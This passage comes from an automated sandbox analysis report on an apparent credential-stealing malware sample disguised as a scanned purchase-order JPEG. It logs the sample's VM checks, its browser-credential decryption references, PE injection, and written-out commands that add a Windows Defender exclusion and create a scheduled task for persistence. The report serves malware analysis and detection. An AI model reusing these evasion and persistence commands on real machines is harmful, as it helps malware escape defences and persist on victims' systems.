                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597858
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597749
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597640
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597531
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597421
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597312
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597203
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597093
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596984
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596875
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596765
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596656
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596546
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596437
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596325
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596218
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596109
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595999
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595889
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595781
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595671
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595561
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595452
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595343
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595234
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595124
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595015
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 594906
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 594796
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 594687
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 594578
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 594468
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1731934591.00000000014C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}h`N
                  Source: HJnkiZjAPsec.exe, 00000008.00000002.1777024069.0000000001062000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: HJnkiZjAPsec.exe, 0000000B.00000002.4129499108.0000000000F3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4129429491.0000000000E06000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_06919328 LdrInitializeThunk,LdrInitializeThunk,6_2_06919328
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  .NET source code references suspicious native API functions
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, COVID19.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe"
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe"Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeMemory written: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpB8C6.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess created: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpCB45.tmp"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeProcess created: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
